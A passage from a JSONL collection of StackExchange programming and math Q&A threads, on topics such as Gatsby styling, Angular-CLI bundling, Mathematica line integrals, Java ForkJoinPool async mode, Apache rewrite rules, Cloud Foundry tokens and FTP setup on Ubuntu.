<code>StyledLink<\/code>.\n<code>const StyledLink = styled(Link)`\n display: inline-block;\n font-family: sans-serif;\n border-radius: 25px;\n padding: 0px;\n text-decoration: none;\n border: 2px solid green;\n<\/code>\nHowever, this won't have any affect on a regular gatsby <code>Link<\/code> component. You still need to render this new <code>StyledLink<\/code> styledComponent instead of a gatsby <code>Link<\/code> component if you want to see that styled variation on your page. \n<code>const IndexPage = () => (\n<Layout>\n <BtnLink to=\"page-2\">Request Quote<\/BtnLink>\n <StyledA href=\"page-2\">Request Quotes<\/StyledA>\n <StyledLink to=\"page-2\">Link<\/StyledLink>\n<\/Layout>\n)\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to set padding of Gatsby Link Component to 0px with styled-components","dup_signals":{}},"subset":"stackexchange"} +{"text":"Properly configure scripts with Angular-CLI\n\nQuestion: Let's say I have a project which uses these JS libraries:\n\n<code>main.js<\/code> which has to be loaded in all pages\n<code>joe.js<\/code> which is a npm package to be loaded in all pages\n<code>bob.js<\/code> which is an old-style 3rd party JS library with no module defined to be loaded in all pages\n<code>max.js<\/code> which is a CommonJS library to be loaded on-demand in some components\n\nSo far, I succeded in:\n\nincluding <code>main.js<\/code> in the <code>scripts<\/code> property of <code>angular-cli.json<\/code>\nthe same as above for <code>joe.js<\/code> using relative paths (<code>..\/node_modules\/joe\/dist\/joe.js<\/code>)\n\nso they end up in the generated bundle that is loaded on every page.\nI had instead a lot of problems with the other two. So far I've managed to include <code>bob.js<\/code> in the bundle by wrapping it in a self-executing function:\n<code>(function() {\n \/\/ old code of bob.js\n })();\n<\/code>\nbut why? \nAnd I'm totally clueless on how to include\/bundle <code>max.js<\/code>...\nAnswer: For <code>main, joe and bob.js<\/code> you should do this:\nTo have the scripts available everywhere you can use the <code>src\/assets<\/code> folder in your angular-cli folder structure.\nAnd then include your scripts with: \n<code><script src=\"assets\/my-script.js\"><\/script>\n<\/code>\nAs an option you can get those dependencies from <code>node_modules<\/code> to <code>src\/assets<\/code> with a webpack. \nFor most cases using CDN is better option than all this.\n\nAs for <code>max.js<\/code> you i would create a service to conveniently inject it:\n<code>import { Injectable } from '@angular\/core';\n\n@Injectable()\nexport class MaxService {\n\n lib: any;\n constructor(){\n this.lib = require('max.js');\n }\n\n}\n<\/code>\nComment: Maybe I got it wrong or I was not clear about it, but in `\/assets\/` they are not bundled but copied \"as is\" which is not my intent (I'd like them all bundled and minified). With `angular-cli.json` anyway I managed somehow to bundle them together, so it's okay (besides, I use cdn's when possible, but I need also to understand the mechanics).\nInteresting the service bit about `max.js`, which seems to be my missing piece. Thanks, I'll try and let you know!\nComment: In your situation i would npm install the libraries, minify them directly from node\/modules and move them with webpack to src\/assets and include them from there as i explained. If you feel my asnwer helped you please upvote.\nComment: as I stated (and tagged) I am working with Angular-CLI, I cannot configure or use webpack directly by any means except for what the tool exposes, which is not much.\nI am *not* using webpack per-se.\nComment: Yes you can use webpack. Create a npm command that calls webpack yourself and use it as \"prebuild\".\n","meta":{"source":"stackoverflow","title":"Properly configure scripts with Angular-CLI","dup_signals":{}},"subset":"stackexchange"} +{"text":"Setting up a TransformedDistribution with random parameter\n\nQuestion: I would like to set up a transformed distribution as below:\nFor each draw from this transformed distribution, I would do the following:\n\nDraw x1 from X ~ U(0,1)\nDraw and output y1 from Y ~ U(0,x1)\n\nI tried setting up transformed distribution using:\n<code>TransformedDistribution[x2,\n {\n x1 \\[Distributed] UniformDistribution[{min1, max1}], \n x2 \\[Distributed] UniformDistribution[{min2, x1 }]\n }]\n<\/code>\nBut the above uses a fixed value for the second draw from the uniform distribution.\nThe corresponding R code for making draws is below where <code>n<\/code> is the number of draws needed:\n<code>draw.rand <- function(n) {\n list.rand <- lapply(1:n, function(i) {\n vec.max <- runif(1)\n vec.rand <- runif(1, min = 0, max = vec.max)\n vec.rand})\n unlist(list.rand)}\n\ndraw.rand(100)\n<\/code>\nEdit: I would like to evaluate the <code>CDF<\/code>, <code>PDF<\/code> of the new distribution.\nAnswer: Solution\nYou are after <code>ParameterMixtureDistribution<\/code>.\n<code>ClearAll[dist];\ndist[min2_, min1_, max1_] := ParameterMixtureDistribution[\n UniformDistribution[{min2, x1}]\n , x1 \\[Distributed] UniformDistribution[{min1, max1}]\n ];\n<\/code>\nYour example\n<code>PDF[dist[0, 0, 1], x]\n<\/code>\n\n<code>CDF[dist[0, 0, 1], x]\n<\/code>\n\n<code>Plot[\n Evaluate@PDF[dist[0, 0, 1], x]\n , {x, 0, 1.2}\n , PlotTheme -> \"Scientific\"\n , PlotRange -> {0, 5}\n ]\n<\/code>\n\nAnother example\n<code>PDF[dist[1, 2, 3]]\n<\/code>\n\n<code>Plot[\n Evaluate@PDF[dist[1, 2, 3], x]\n , {x, 0, 5}\n , PlotTheme -> \"Scientific\"\n ]\n<\/code>\n","meta":{"source":"mathematica.stackexchange","title":"Setting up a TransformedDistribution with random parameter","dup_signals":{}},"subset":"stackexchange"} +{"text":"Line Integral Difficulty\n\nQuestion: I am having difficulty with the following question:\nCompute the line integral of \n$$f(x,y)=\\frac{xy}{1+x+2y},$$\nalong the unit quarter-circle in the first quadrant from (1,0) to (0,1).\nMy problem could either be a mathematic mistake or a Mathematica difficulty, I am not sure which.\nI define my function:\n<code>f[{x_, y_}] = x y\/(1 + x + 2 y)\n<\/code>\nThen I parametrize the unit quarter circle as follows:\n<code>r[t_] = {Cos[t], Sin[t]}\n<\/code>\nI am going to compute the integral\n$$\\int_0^{\\pi\/2} f(\\vec r(t))\\,|\\vec r\\,'(t)|\\,dt,$$\nso I perform this next:\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify\n<\/code>\nThen I integrate and find a numerical approximation.\n<code>Integrate[integrand, {t, 0, \\[Pi]\/2}]\nN[%]\n\n(* 0.168183 *)\n<\/code>\nNow I do a second parametrization of the unit quarter circle, namely, I let $x=t$, then $y=\\sqrt{1-t^2}$, but here I will need to let my $t$-values vary from $t=1$ to $t=0$ in order for the parametrization to move again from the point (1,0) to the point (0,1). So I do this next:\n<code>r[t_] = {t, Sqrt[1 - t^2]}\n<\/code>\nThen I do this:\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify\n<\/code>\nThen I integrate from $t=1$ to $t=0$ (and I am expecting the same answer as I got above):\n<code>Integrate[integrand, {t, 1, 0}]\n% \/\/ N\n\n(* -0.168183 *)\n<\/code>\nI got the negative of the answer above. \nSo, my question. Am I making some type of mathematical error in my thinking, or is there something strange happening with Mathematica?\nUpdate: MichaelE2 may be right. It may be the $\\Delta t$ problem, keeping it positive. In order to have the $t$-values go from $t=0$ to $t=1$, and to have the curve pass from (1,0) to (0,1), I am going to have to choose a different parametrization.\n<code>r[t_] = {1 - t, Sqrt[1 - (1 - t)^2]}\n<\/code>\nThen:\n<code>Manipulate[\n ParametricPlot[r[t], {t, 0, final}, PlotRange -> 1] \/. \n Line -> Arrow,\n {{final, 0.5}, 0.00001, 1}]\n<\/code>\n\nNow we integrate.\n<code>integrand = f[r[t]] Sqrt[r'[t].r'[t]] \/\/ Simplify;\nIntegrate[integrand, {t, 0, 1}];\n% \/\/ N\n\n(* 0.168183 *)\n<\/code>\nBut I am still going to have to take some more time thinking about this.\nComment: You can evaluate this integral symbolically using `Integrate[(x y)\/(1 + x + 2 y) \/. {x -> Cos[\\[Theta]], y -> Sin[\\[Theta]]}, {\\[Theta], 0, \\[Pi]\/2}]`.\nComment: The $ds$ in the integral represents $\\Delta s = \\sqrt{\\sum \\Delta x} = \\sqrt{\\sum x'(c_i)^2 \\Delta t_i^2} = \\sqrt{\\sum x'(c_i)^2}\\, |\\Delta t_i|$, which equals $ \\sqrt{\\sum x'(c_i)^2}\\, \\Delta t_i$ only if the $\\Delta t_i >0$, i.e., if you integrate from $t=0$ to $t=1$. (So I think there is a mathematical error in how you set up the second integral.)\nComment: @MichaelE2 I think I found what I needed (examples) at: [http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtI.aspx](http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtI.aspx) and [http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtII.aspx](http:\/\/tutorial.math.lamar.edu\/Classes\/CalcIII\/LineIntegralsPtII.aspx). I am making a mathematical error.\nAnswer: \nNote the last condition, or consider limit of Riemann sum $\\Delta t=\\frac{b-a}{n}$.\nAs can be seen the expected integral should be positive:\n<code>f[x_, y_] := x y\/(1 + x + 2 y);\np3 = Plot3D[f[x, y], {x, 0, 1}, {y, 0, 1}, \n MeshFunctions -> (#1^2 + #2^2 &), Mesh -> {{1}}, \n PlotStyle -> Opacity[0.5]];\npp = ParametricPlot3D[{t, Sqrt[1 - t^2], f[t, u Sqrt[1 - t^2]]}, {t, \n 0, 1}, {u, 0, 1}, Mesh -> None, PlotStyle -> Blue];\nShow[p3, pp]\n<\/code>\n\nSee paramatrizations: $\\{x,y\\}\\mapsto\\{t,\\sqrt{1-t^2}\\}$, or$\\{x,y\\}\\mapsto\\{\\sqrt{1-t^2},t\\}$ for $0\\le t\\le 1$ or $\\{x,y\\}\\mapsto\\{\\cos (t),\\sin (t)\\}$ for $0\\le t\\le \\pi\/2$.\nSo,\n<code>NIntegrate[f[Sqrt[1 - t^2], t]\/Sqrt[1 - t^2], {t, 0, 1}]\nNIntegrate[f[t, Sqrt[1 - t^2]]\/Sqrt[1 - t^2], {t, 0, 1}]\nNIntegrate[f[Cos[t], Sin[t]], {t, 0, Pi\/2}]\n<\/code>\nall yield 0.168183 (and same analytic result).\nOr else consider,$\\int_C y ds$ for the same $C$ with same parametrizations:\n<code>Integrate[1, {t, 0, 1}]\nIntegrate[t\/Sqrt[1 - t^2], {t, 0, 1}]\nIntegrate[Sin[t], {t, 0, Pi\/2}]\n<\/code>\nall yield 1.\nComment: Replace `t` by `1-t`.\nComment: Thanks for the nice answer, but I still see a problem. The parametrization $(x,y)\\to (t,\\sqrt{1-t^2})$ as $0\\le t\\le 1$ does not trace the quarter unit-circle from (0,1) to (1,0). Rather, it traces the unit circle from (0,1) to (1,0), so it is not the correct parametrization for this problem.\nComment: @murray Yep, that's what I did too.\nAnswer: <code>Integrate<\/code> supports <code>Region<\/code> primitives, so you can use:\n<code>Integrate[(x y)\/(1 + x + 2 y), {x, y} \u2208 Circle[{0, 0}, 1, {0, \u03c0\/2}]]\n<\/code>\n\n1\/25 (15 - 2 \u03c0 + Log[8] - 3 Log[9])\n\nNumerical approximation:\n<code>N @ %\n<\/code>\n\n0.168183\n","meta":{"source":"mathematica.stackexchange","title":"Line Integral Difficulty","dup_signals":{}},"subset":"stackexchange"} +{"text":"What is ForkJoinPool Async mode\n\nQuestion: What does Async mode of ForkJoinPool mean? Javadoc mentions that it makes queues (is it per-thread queue?) FIFO instead of LIFO. What does it mean in practice?\nAnswer: Each worker thread in a <code>ForkJoinPool<\/code> has its own work queue. Async mode concerns the order in which each worker takes forked tasks that are never joined from its work queue.\nWorkers in a <code>ForkJoinPool<\/code> in async mode process such tasks in FIFO (first in, first out) order. By default, <code>ForkJoinPool<\/code>s process such tasks in LIFO (last in, first out) order.\nIt's important to emphasise that the async mode setting only concerns forked tasks that are never joined. When using a <code>ForkJoinPool<\/code> for what it was originally designed for, namely recursive fork\/join task decomposition, <code>asyncMode<\/code> doesn't come into play at all. Only when a worker is not engaged in actual fork\/join processing does it execute async tasks, and only then is the <code>asyncMode<\/code> flag actually queried.\nHere's a small program that demonstrates the difference between the two different async mode settings:\n<code>import java.util.concurrent.*;\nimport java.util.concurrent.atomic.AtomicInteger;\n\n\/**\n * Demo of {@code ForkJoinPool} behaviour in async and non-async mode.\n *\/\npublic class ForkJoinAsyncMode {\n public static void main(String[] args) {\n \/\/ Set the asyncMode argument below to true or false as desired:\n ForkJoinPool pool = new ForkJoinPool(\n 4, ForkJoinPool.defaultForkJoinWorkerThreadFactory, null, true);\n\n pool.invoke(new RecursiveRangeAction(0, 200));\n pool.awaitQuiescence(2L, TimeUnit.SECONDS);\n }\n\n \/**\n * A {@code ForkJoinTask} that prints a range if the range is smaller than a\n * certain threshold; otherwise halves the range and proceeds recursively.\n * Every recursive invocation also forks off a task that is never joined.\n *\/\n private static class RecursiveRangeAction extends RecursiveAction {\n private static final AtomicInteger ASYNC_TASK_ID = new AtomicInteger();\n\n private final int start;\n private final int end;\n\n RecursiveRangeAction(int start, int end) {\n this.start = start;\n this.end = end;\n }\n\n @Override\n protected void compute() {\n if (end - start < 10) {\n System.out.format(\"%s range [%d-%d] done%n\",\n Thread.currentThread().getName(), start, end);\n } else {\n int mid = (start + end) >>> 1;\n int id = ASYNC_TASK_ID.incrementAndGet();\n\n System.out.format(\n \"%1$s [%2$d-%3$d] -< [%3$d-%4$d], fork async task %5$d%n\",\n Thread.currentThread().getName(), start, mid, end, id);\n\n \/\/ Fork off additional asynchronous task that is never joined.\n ForkJoinTask.adapt(() -> {\n System.out.format(\"%s async task %d done%n\",\n Thread.currentThread().getName(), id);\n }).fork();\n\n invokeAll(new RecursiveRangeAction(start, mid),\n new RecursiveRangeAction(mid, end));\n }\n }\n }\n}\n<\/code>\nIn non-async mode (the default for <code>ForkJoinPool<\/code>), forked tasks that are never joined are executed in LIFO order.\nWhen you run the example program in non-async mode, looking at the output of one worker you might see a pattern like the following:\n<code>ForkJoinPool-1-worker-0 [175-187] -< [187-200], fork async task 10\nForkJoinPool-1-worker-0 [175-181] -< [181-187], fork async task 11\nForkJoinPool-1-worker-0 range [175-181] done\nForkJoinPool-1-worker-0 range [181-187] done\nForkJoinPool-1-worker-0 [187-193] -< [193-200], fork async task 12\nForkJoinPool-1-worker-0 range [187-193] done\nForkJoinPool-1-worker-0 range [193-200] done\nForkJoinPool-1-worker-0 async task 12 done\nForkJoinPool-1-worker-0 async task 11 done\nForkJoinPool-1-worker-0 async task 10 done\n<\/code>\nHere, tasks 10, 11, 12 are forked and later executed in reverse order once the worker gets around to executing them.\nIn async mode on the other hand, again looking at the output of one worker the pattern would rather look like the following:\n<code>ForkJoinPool-1-worker-3 [150-175] -< [175-200], fork async task 8\nForkJoinPool-1-worker-3 [150-162] -< [162-175], fork async task 9\nForkJoinPool-1-worker-3 [150-156] -< [156-162], fork async task 10\nForkJoinPool-1-worker-3 range [150-156] done\nForkJoinPool-1-worker-3 range [156-162] done\nForkJoinPool-1-worker-3 [162-168] -< [168-175], fork async task 11\n...\nForkJoinPool-1-worker-3 async task 8 done\nForkJoinPool-1-worker-3 async task 9 done\nForkJoinPool-1-worker-3 async task 10 done\nForkJoinPool-1-worker-3 async task 11 done\n<\/code>\nTasks 8, 9, 10, 11 are forked and later executed in the order they were submitted.\nWhen to use which mode? Whenever a <code>ForkJoinPool<\/code> thread pool is chosen to take advantage of its work-stealing properties rather than for recursive fork\/join task processing, async mode is probably the more natural choice, as tasks get executed in the order they are submitted.\nAsync event-driven frameworks like <code>CompletableFuture<\/code> are sometimes said to profit from async mode. For example, when constructing a complex chain of <code>CompletableFuture<\/code> callbacks, then a custom <code>ForkJoinPool<\/code> executor in async mode might perform slightly better than the default executor. (I can't speak from experience though.)\nComment: What's the purpose though? Latency? Making it more CPU-friendly somehow?\nComment: In order to utilize the asyncMode, I would recommend using `Executors.newWorkStealingPool()`. Your custom ForkJoinPool implementation is same as the work-stealing ExecutorService, with just a change in the parallelism count. My General Rule of Thumb for LIFO: ForkJoinPool's commonPool, for FIFO: work-stealing ExecutorService.\nAnswer: It is meant for event-style tasks that are submitted but never joined.\nSo basically tasks that are getting executed for their side-effects, not for returning a result that will be processed by the forking task after joining.\n","meta":{"source":"stackoverflow","title":"What is ForkJoinPool Async mode","dup_signals":{}},"subset":"stackexchange"} +{"text":"http requests from server itself\n\nQuestion: I am running a website on AWS EC2 instance. I am logging http requests headers. When I checked the logs, I noticed that there are many requests from the AWS EC2 instance public ip. \nExample:-\n\nAWS EC2 public ip : 188.8.131.52\n\n<code>{\"headers\":{\"host\":\"184.108.40.206:80\"}}\n<\/code>\nIs it possible to have server sending http request to itself for viewing web pages?\nI am logging each request and the url they are requested.\nI tested and logged the files locally by creating a local server but there were no requests from server to itself or something like this. \nI am new here, help me with some explanation. Is it a security threat? If it is, How it can be resolved?\nAnswer: That is not the source IP of the request, it's the value of what the user agent set in the <code>Host<\/code> header.\nWhen I make a HTTP request to StackExchange to fetch this question page, it looks like this:\n<code>GET \/questions\/169836\/http-requests-from-server-itself HTTP\/1.1\nHost: security.stackexchange.com\n...\n<\/code>\nThe <code>Host<\/code> header indicates that I wish to load from the <code>security.stackexchange.com<\/code> host, and is usually automatically filled by my browser when I make a request. It knows the host because it's in the full URL I'm visiting.\nThe header allows one server to host multiple sites on multiple domains via virtual hosting. One HTTP server on one IP address can host multiple sites with different domain names (each pointing to the same IP via DNS) differentiated by the content of the <code>Host<\/code> header sent by the user agent (e.g. a browser).\nWhat you're seeing is either requests someone made manually by going to <code>http:\/\/18.104.22.168<\/code> or requests made by automated systems that scan the internet. In the case of the latter, they likely scan by IP space only and do not know the correct hostname for the system, so simply provide a <code>Host<\/code> header with the IP address in.\nIn summary: these requests are not being made from your own webserver, and I would not say this is a security concern.\nComment: oh thnx alot.. 1 more question if you can help... Sometimes i even have empty headers ... like Headers:{} and sometimes there are no host or user-agent property...sometimes just \"accept\" property... is it safe too? Any way i can check the source of the request?\nComment: @HimanshuBansal Chances are these are just random bits of traffic from the internet from various indexers, scanners, etc. The internet is a noisy place. If you're concerned, consider setting up mod_security or whatever the equivalent WAF is for your server application.\nComment: Thnx i'll look into it.\n","meta":{"source":"security.stackexchange","title":"http requests from server itself","dup_signals":{}},"subset":"stackexchange"} +{"text":"Local DNS in a standard DHCP LAN\n\nQuestion: Our customers are typical broadband home users, with a DSL Modem\/Router which offers DHCP.\nWe want our device which is connected to the home LAN and has an embedded HTTP Server to be addressable with a domain name (www.mydevice.ip or something). In particular, we want to avoid that the user has to get the IP address and type it into the address bar of his browser.\nWhat solutions are available? \nHas the typical DHCP Modem a DNS included - how do you use it?\nCould other services offer help (eg. Bonjour)?\nAnswer: You can use mDNS\/DNS-SD using \"avahi\" daemon -- this should work on mac + linux hosts, and maybe for windows.\nFor Windows, you can set up SAMBA to get WINS name resolution.\nAnswer: A \"typical DHCP Modem\" is no standard so there is no default answer.\nWhat you want, is that the modem works as a DNS cache (which is pretty much the default) and additionally add your own, static DNS entries that point to the IP of the entry.\nHow you achieve that depends on the router...\n","meta":{"source":"stackoverflow","title":"Local DNS in a standard DHCP LAN","dup_signals":{}},"subset":"stackexchange"} +{"text":"Query table by filtering criteria from rows\n\nQuestion: Need help with querying in c# with entity framework. \nI have an advanced search page where I can select multiple options from a checkbox list. These selected options should be filtered from a table which has each option as a value. \n\nThis is the snapshot of my table.\n\nFrom this table, my select options are below:\n\nIf I select more than one of them, I need to retrieve the data which holds for all the values checked. i.e., I should apply an \"AND\" condition with the selected values to get the employee who has all the selected values. The below code wouldnt apply the filter as an \"AND\" operation because I am comparing each item individually with the list of rows. \n<code>foreach (var item in UIFilter.SecurityOptions)\n {\n securityOverrideList.AddRange(\n secureDbContext.\n SecurityOverride.\n Where(p => p.SECURITY_ROLE_CD.Equals(item)).\n Select(p => p.EMPL_ID));\n }\n<\/code>\nCan someone suggest me a way to do this in C# as I am not having access to create procedures in my DB right now. \nComment: why you need a `foreach` loop here?\nAnswer: Could you probably try the following:\n<code>var potentialEmployees = secureDbContext.SecurityOverride.Where(a => UIFilter.SecurityOptions.Contains(a.SECURITY_ROLE_CD));\nvar securityOverrideList = potentialEmployees.Select(x => x.EMPL_ID).Distinct();\nforeach (var item in UIFilter.SecurityOptions)\n{\n var subsetEmployeeIds = potentialEmployees.Where(a => a.SECURITY_ROLE_CD == item).Select(x => x.EMPL_ID);\n securityOverrideList = securityOverrideList.Where(a => subsetEmployeeIds.Contains(a));\n}\n<\/code>\nLooking at your structure, there would be no single row that would meet all of the selected roles. As such, we need to get all potential employeeId (assuming this is what you are looking for as you are projecting only the employee id). \nNext, we loop through again for each security role to ensure that the securityOverrideList becomes smaller as it needs to meet all of those criteria.\n","meta":{"source":"stackoverflow","title":"Query table by filtering criteria from rows","dup_signals":{}},"subset":"stackexchange"} +{"text":"URL rewriting variable name\n\nQuestion: I am trying to rewrite an URL so that a passed variable is replaced with a new id, for example;\n<code>wwww.domain.com\/default.php?s=1&lang=en<\/code>\nTo be rewritten to:\n<code>www.domain.com\/default.php?id=1$lang=en<\/code>\nThe s variable being replaced with id\nI have tried:\n<code>RewriteEngine on\nOptions +FollowSymlinks\nRewriteBase \/\nRewriteCond %{QUERY_STRING} ^s=(.+)$\nRewriteRule ^s=(.+)$ id=$1 [R,NC,L]\n<\/code>\nalso\n<code>RewriteRule ^s=(.+)$ id=%1 [R,NC,L]\n<\/code>\nno luck... what am I doing wrong?\nThanks for any help!!\nAnswer: This should work if even if you don't have <code>s<\/code> as the first variable. (Not sure what you really want.)\n<code>Options +FollowSymlinks\nRewriteEngine On\nRewriteCond %{QUERY_STRING} ^(.*&)*s=(.*)(&*)$\nRewriteRule ^default.php$ default.php?%1&id=%2%3\n<\/code>\nComment: Almost -- right now it's a way to broad as it will also match `\/default.php?yes=123\u27e8=en`\nAnswer: Try this out:\n<code>RewriteRule ^default.php?s=([0-9]+)&lang=en$ default.php?id=$1&lang=en\n<\/code>\nEdit.\nA more generic version.\n<code>RewriteRule ([^?]+)?s=([0-9]+)&lang=([A-z]{2})$ $1?id=$2&lang=$3\n<\/code>\nComment: RewriteRule does not work with query string like that -- only with help of RewriteCond. Therefore this rule is completely useless in Apache\nComment: LazyOne - I always use it in this way, I know it isn't the best way. It should work though, at least the first one should.\nComment: You see -- RewriteRule pattern only matches **path part** of the URL -- query string has to be matched via RewriteCond. I have NEVER seen it working in this way (unless you have some unknown-to-me-yet extra module installed\/enabled that allows such behaviour). I was debugging quite a lot of rewrite rules (where Apache gives detailed info on what data it is working with right now) and I can clearly see that query string matching has to be done separately.\n","meta":{"source":"stackoverflow","title":"URL rewriting variable name","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to retrieve the cloud foundry oauth token from a devops deploy stage for setting up auto scaling?\n\nQuestion: I'm trying to get the cloud foundry oauth-token from a devops pipeline deploy stage:\n<code>...\ncf push $CF_APP\n...\n\naccessToken=$(cf oauth-token | grep bearer | sed -e s\/bearer\/Bearer\/g)\necho accessToken=$accessToken\n...\n# use token in Auto Scaling API call ...\ncurl $createPolicyUrl -X 'PUT' -H 'Content-Type:application\/json' \\\n -H 'Accept:application\/json' \\\n -H \"Authorization:$accessToken\" \\\n --data-binary @${policyJson} \\\n -s -o response.txt -w '%{http_code}\\n'\n<\/code>\nThe output from the echo command is:\n<code>accessToken=\n<\/code>\nHow can I retrieve the oauth token?\nNote that <code>cf push<\/code> works ok in the script ecen though there isn't a <code>cf login<\/code> performed in the deploy script. Therefore, I'm assuming cf oauth-token would not need login either. Is this a valid assumption?\nUpdate: I added <code>cf login<\/code> to my deploy script:\n<code>...\ncf push $CF_APP\n...\n\ncf login\naccessToken=$(cf oauth-token | grep bearer | sed -e s\/bearer\/Bearer\/g)\necho accessToken=$accessToken\n...\n<\/code>\nThe output:\n<code>cf login not allowed.\n<\/code>\nSee also my similar question on reconfiguring availability monitoring in a devops deploy stage.\nComment: I'm assuming you're using the bluemix cli? You can login via `bx login` and then run `bx cf oauth-token`. I think that should get you what you want\nAnswer: Make sure to do a <code>cf login<\/code> to log in before you run the <code>cf oauth-token<\/code> command. Also make sure to double quote <code>\"Authorization:$accessToken\"<\/code> so the variable is substituted. \nUpdate: It looks like you can access the oauth-token from within the script via the <code>$CF_TOKEN<\/code> environment variable. The token is associated with the owner of the pipeline, not the user running the current pipeline stage.\nComment: Unfortunately, `cf login` is not allowed. I've updated the question to reflect this.\nComment: Yes, in Delivery Pipeline it's best to use the `$CF_TOKEN`\nAnswer: Can you try\n<code>accessToken=$(cf oauth-token)\nCF_TOKEN=$(echo $accessToken | grep \"Bearer*\" | perl -wpe 's\/.*(Bearer .+)\/$1\/')\nCF_TOKEN should now have the token value\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to retrieve the cloud foundry oauth token from a devops deploy stage for setting up auto scaling?","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"no control matching name\" in mechanize for python\n\nQuestion: I am using mechanize for python and I am trying to search for an item in kijiji. Eventually my goal is for my program to search for an item, and using beautifulsoup, check whether or not someone has posted a new ad for my search term by scraping through the html source that comes from inputting a search term and e-mailing me if any new ads show up so that I can be the first one to respond. Below is my code, but I get an error:\"no control matching name 'keywords\". I am not sure what I am doing wrong. \n<code>import mechanize\nbr = mechanize.Browser() # allow everything to be written to\nbr.set_handle_robots(False) # ignore robots\nbr.open(\"http:\/\/www.kijiji.ca\/h-kitchener-waterloo\")\nbr.select_form(nr=0)\nbr[\"keywords\"] = \"Nvidia\"\n<\/code>\nAnswer: Your code is OK but there is no form named 'keywords' in the page. You can look into page source info to verify that.\nComment: I am looking to input data for the search box, which has a name of \"keywords\". The code should be br[\"keywords\"] = \"Nvidia\", but that doesn't work either. If you right click on the search box and click \"Inspect Element\" you will see what I mean.\nAnswer: Although this specific error I could not solve, I discovered an alternative way to tackling my ultimate goal which is to scrape a website and inform me of any changes. You can do this by changing the keyword found in the url(example:\"kijiji.ca\/monitor\/kitchener-waterloo) to whatever product you are searching for, and then downloading the html source for that url on a timed basis and checking if the code matches the previous. If it doesn't, send an e-mail because you know a new ad has been posted.\n","meta":{"source":"stackoverflow","title":"\"no control matching name\" in mechanize for python","dup_signals":{}},"subset":"stackexchange"} +{"text":"Return different ManyToMany objects based on param using Django and DRF\n\nQuestion: I'm trying to figure out if what's the best way to implement this behavior:\nI have an object of type \"Recipe\", whose related model \"IngredientRecipe\" is obtained from a list of \"Products\" with information about its \"Supplier\". A recipe may have \"beef\" as an ingredient and this ingredient is supplied by several suppliers. What I want to obtain is a recipe whose list of ingredients corresponds to the ingredients supplied by the suppliers of the selected location.\nFor example:\nhttps:\/\/api.url\/recipes\/34\/?location=1\nThis would return the detail of the recipe with id=34 and the list of ingredients but from the location with id=1. That is, the price of the ingredient \"beef\" will be the one corresponding to the supplier of the location id=1.\nmodels.py:\n<code>class Recipe(models.Model):\n user = models.ForeignKey(User, null=True, on_delete=models.CASCADE, related_name='user_recipes')\n title = models.CharField(_('Recipe title'), max_length=255, blank=True)\n\nclass IngredientRecipe(models.Model):\n product = models.ForeignKey(Product, on_delete=models.CASCADE, related_name='products')\n recipe = models.ForeignKey(Recipe, on_delete=models.CASCADE, related_name='ingredients')\n quantity = models.FloatField(_('Quantity'))\n\nclass Product(models.Model):\n name = models.CharField(_('Name'), max_length=255)\n price = models.FloatField(_('Sale price'), default=0)\n supplier = models.ForeignKey(Supplier, blank=True, null=True, related_name='supplier_products',\n on_delete=models.CASCADE)\n\nclass Supplier(models.Model):\n name = models.CharField(_('Name'), max_length=255)\n location = models.ForeignKey(Location, on_delete=models.CASCADE)\n<\/code>\nRight now I'm using ModelViewSets and ModelSerializers to render saving my objects.\nThank you very much in advance.\nAnswer: You can <code>related_name='ingredients'<\/code> on recipe field of <code>IngredientRecipe<\/code>:\n<code>def your_view_name(request, recipie_id):\n data = request.query_params # to take the location id query parameter\n data._mutable = True # dictionary from frontend immutable sometimes\n location_id = data.location\n recipie_list = Recipe.objects.filter(ingredients__product__supplier__location__id=location_id) # will get the recipie queryset based on the location.\n<\/code>\n","meta":{"source":"stackoverflow","title":"Return different ManyToMany objects based on param using Django and DRF","dup_signals":{}},"subset":"stackexchange"} +{"text":"System.AccessViolationException\n\nQuestion: I am using a com DLL in the following manner:\n<code>#Region \"API Function\"\n <DllImportAttribute(\"abc.dll\", EntryPoint:=\"optcntl\")> _\n Public Shared Function optcntl(ByRef pBlocks As blocks) As Integer\n End Function\n#End Region\n<\/code>\nThis DLL using the other four dlls to complete its processing. If I change the current directory path from the \/bin\/ folder to other folder in C or D drive which contains all the DLL. I get the following Error message: \nSystem.AccessViolationException: Atempted to read or write protected memory. \nThis is often an indication that other memory is corrupt\nAny help would be appriaciated..\nAnswer: If I understand it correctly, this errors out whenever you change the current directory path to one NOT containing the four dlls that abc.dll calls. If so, it may be that abc.dll is always looking in the currect directory path for the other four dlls rather than the application directory or some specific place. However, this would normally give you a different error message, so make sure that there is not an old bug-ridden copy of the four dlls on the hard drive that is inadvertantly being picked up when you change the currendt directory.\nComment: Thanks a lot for you reply, I put all DLLs in that particular folder which are used by abc.dll.\n","meta":{"source":"stackoverflow","title":"System.AccessViolationException","dup_signals":{}},"subset":"stackexchange"} +{"text":"Ubuntu 16.04 Can't connect with FTP, only SFTP\n\nQuestion: I'm currently running an Ubuntu 16.04 VPS, to host my website and files. My default (S)FTP port is 22, but when I use SFTP, it takes literal hours to upload files.\n\nI have a 30mb\/s upload speed.\nWith uploading, uploads can go as slow as 5kb\/s.\n\nNow are my files not very special, so I'm not in the need of an encrypted connection (just trust me here). And I know for a fact, that my uploads with FTP can cap out at the max. 30mbs\/sec.\nBut when I tried to open FTP port 21 on my server (no errors thrown) for both tcp \/ udp, my FTP Client (WinSCP) refuses to connect. Does anybody know what can cause this? or a simple fix for the slow sftp connection?\nI'm pretty new at this, so thanks for the help!\nComment: if you have been able to upload at over 30mbs\/sec, with FTP... how is FTP not working?\nComment: By `mb\/s` do you mean `megabits per second` or `megabytes per second`? Usually 'upload speeds' are in megabits.\nComment: @Thomas Ward in megabytes in this case. but that doesn't matter for the question, because sftp is stil underperforming. and i cant get to ftp\nComment: Did you install a FTP server?\nComment: @thim24 you need to install an FTP server for FTP to work - it doesn't come available 'out of the box'. As for 'slow connection', where's the server related to you? If it's a good distance away then your speed *will* be impacted, even if it's FTP. Also, FTP is **insecure** 